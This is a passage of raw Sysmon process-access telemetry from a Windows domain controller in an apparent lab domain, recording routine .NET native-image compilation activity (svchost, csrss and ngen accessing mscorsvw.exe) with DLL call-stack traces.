ET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005946Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:46:15.468{59A5CD1D-9126-6005-B501-00000000A301}1128C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\468-0\Microsoft.CSharp.dll2021-01-18 13:46:15.468 10341000x80000000000000005964Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:16.406{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9128-6005-BB01-00000000A301}3260C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005963Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:16.390{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9128-6005-BB01-00000000A301}3260C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005962Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:16.390{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9128-6005-BB01-00000000A301}3260C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005961Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:16.328{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9128-6005-BA01-00000000A301}1068C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000005960Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:16.312{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9128-6005-BA01-00000000A301}1068C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005959Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:16.312{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9128-6005-BA01-00000000A301}1068C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+
84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005983Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:17.968{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9129-6005-C101-00000000A301}4780C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005982Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:17.968{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9129-6005-C101-00000000A301}4780C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005981Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:17.968{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9129-6005-C101-00000000A301}4780C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005980Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:17.922{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9129-6005-C001-00000000A301}4540C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005979Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:17.906{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9129-6005-C001-00000000A301}4540C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005978Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:17.906{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9129-6005-C001-00000000A301}4540C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005977Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:17.843{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9129-6005-BF01-00000000A301}4692C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005976Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:17.828{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9129-6005-BF01-00000000A301}4692C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005975Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:17.828{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9129-6005-BF01-00000000A301}4692C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005974Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:17.718{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9129-6005-BE01-00000000A301}1556C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005973Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:17.703{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9129-6005-BE01-00000000A301}1556C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005972Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:17.703{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9129-6005-BE01-00000000A301}1556C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005971Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:17.578{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9129-6005-BD01-00000000A301}2352C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005970Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:17.562{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9129-6005-BD01-00000000A301}2352C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005969Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:17.562{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9129-6005-BD01-00000000A301}2352C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005968Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:17.484{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9129-6005-BC01-00000000A301}4584C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005967Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:17.484{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9129-6005-BC01-00000000A301}4584C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005966Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
